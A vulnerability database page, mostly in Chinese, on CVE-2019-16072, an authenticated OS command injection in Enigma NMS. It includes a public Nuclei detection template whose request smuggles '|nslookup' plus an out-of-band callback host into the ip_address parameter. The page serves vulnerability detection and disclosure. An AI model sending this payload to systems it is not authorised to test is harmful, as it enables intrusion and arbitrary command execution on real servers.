CVE-2019-16072: Enigma NMS < 65.0.0 - Authenticated OS Command Injection

日期: 2025-08-01 | 影响软件: Enigma NMS | POC: 已公开

漏洞描述

An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an authenticated attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.

PoC代码[已公开]

id: CVE-2019-16072

info:
  name: Enigma NMS < 65.0.0 - Authenticated OS Command Injection
  author: 0x_Akoko
  severity: critical
  description: |
    An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an authenticated attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.
  impact: |
    Attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of NETSAS Enigma NMS or apply security patches that fix input sanitization.
  reference:
    - https://www.exploit-db.com/exploits/47202
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16072
    - https://web.archive.org/web/20201220124431/https://www.mogozobo.com/?p=3647
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-16072
    cwe-id: CWE-78
    epss-score: 0.85675
    epss-percentile: 0.99343
    cpe: cpe:2.3:a:netsas:enigma_network_management_solution:*:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 2
    vendor: netsas
    product: enigma_network_management_solution
  tags: cve,cve2019,authenticated,enigma,nms,oast,oob,vkev

flow: http(1) && http(2)

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        GET /cgi-bin/protected/main.cgi HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: response
        words:
          - "ENIGMA NMS"
        internal: true

  - raw:
      - |
        GET /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|nslookup+{{interactsh-url}}&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1 HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "snmp") || status_code == 200'
          - 'contains(interactsh_protocol, "dns")'
        condition: and
# digest: 490a0046304402203dae7463b7cd99d0db0706902aabb867e98422e5467138d1fb2f31686c45044802200331c7c909e8e91aa30d690f1df7ca19892566e53a00e98550cce45cceacb725:922c64590222798bb761d5b6d8e72950

相关漏洞推荐